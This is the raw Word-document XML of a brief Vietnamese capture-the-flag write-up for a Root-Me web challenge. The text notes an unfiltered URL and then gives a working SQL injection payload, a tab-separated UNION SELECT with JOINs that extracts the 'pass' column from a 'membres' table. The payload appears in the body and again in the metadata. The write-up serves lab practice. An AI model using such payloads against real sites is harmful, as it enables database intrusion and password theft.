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D9B5" w14:textId="5DF4CAF7" w:rsidR="00632FE3" w:rsidRDefault="00632FE3">
      <w:r>
        <w:t>Đầu tiên ta vào trang thì thấy url không được filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131B57A0" w14:textId="22D46F5F" w:rsidR="00C020B4" w:rsidRDefault="00BA6473">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6F7524" wp14:editId="646F747B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1185001707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01707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5D70" w14:textId="3FE0A3AB" w:rsidR="00BA6473" w:rsidRDefault="00BA6473">
      <w:r>
        <w:t>Ta sẽ thực hiện truyền payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251328F6" w14:textId="1B38438B" w:rsidR="00C54FA4" w:rsidRDefault="00632FE3">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007B4D4D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://challenge01.root-me.org/web-serveur/ch30/?action=membres&amp;id=9%09UNION%09SELECT%09*%09FROM%09((SELECT%09pass%09FROM%09membres%09LIMIT%091)A%09JOIN%09(SELECT%092)B%09JOIN%09(SELECT%093)C%09JOIN%09(SELECT%093)D)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B8C9D51" w14:textId="7C554172" w:rsidR="001D521D" w:rsidRDefault="001D521D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E132C5" wp14:editId="14E47C5C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="770778102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78102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B8"/>
    <w:rsid w:val="001671B8"/>
    <w:rsid w:val="001D521D"/>
    <w:rsid w:val="00632FE3"/>
    <w:rsid w:val="006849CB"/>
    <w:rsid w:val="00BA6473"/>
    <w:rsid w:val="00C020B4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C6A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{39C353D9-4343-4247-B22D-8C2CCE7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2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challenge01.root-me.org/web-serveur/ch30/?action=membres&amp;id=9%09UNION%09SELECT%09*%09FROM%09((SELECT%09pass%09FROM%09membres%09LIMIT%091)A%09JOIN%09(SELECT%092)B%09JOIN%09(SELECT%093)C%09JOIN%09(SELECT%093)D)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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-14T13:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T15:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>